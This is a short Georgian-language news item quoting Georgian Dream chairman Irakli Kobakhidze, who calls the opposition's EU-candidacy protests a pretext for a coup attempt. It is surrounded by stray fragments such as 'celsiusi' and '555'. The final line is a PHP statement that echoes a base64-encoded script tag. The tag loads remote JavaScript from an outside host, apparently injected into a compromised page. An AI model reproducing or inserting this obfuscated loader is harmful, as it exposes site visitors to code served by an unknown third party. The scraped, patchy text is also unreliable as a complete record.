celsiusi
ავერსი საქკაბელი
"ქართული ოცნების" თავმჯდომარემ, ირაკლი კობახიძემ, განცხადება გააკეთა და გუშინდელ მოვლენებს გამოეხმაურა, სადაც აღნიშნა, რომ გუშინ განვითარებულმა მოვლენებმა საბოლოოდ ცხადყო ის, რასაც საზოგადოებას თავიდანვე პირდებოდნენ. 
 
"გუშინ განვითარებულმა მოვლენებმა საბოლოოდ ცხადყო ის, რასაც საზოგადოებას თავიდანვე ვპირდებოდით, ნაციონალურ მოძრაობასა და მის სატელიტებს საქართველოში არეულობის მოწყობის არავითარი რესურსი არ აქვთ. საზოგადოებამ დაინახა, რომ რადიკალური ოპოზიციისთვის ევროკავშირის კანდიდატობის თემა მხოლოდ მოგონილი შირმა იყო და სინამდვილეში ისინი ამ თემის გამოყენებით საკუთარი ვიწრო პოლიტიკური მიზნის მიღწევას, ხელისუფლების გადატრიალებასა და ძალაუფლების ხელახლა ხელში ჩაგდებას ცდილობდნენ".– განაცხადა კობახიძემ. 
 
555
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");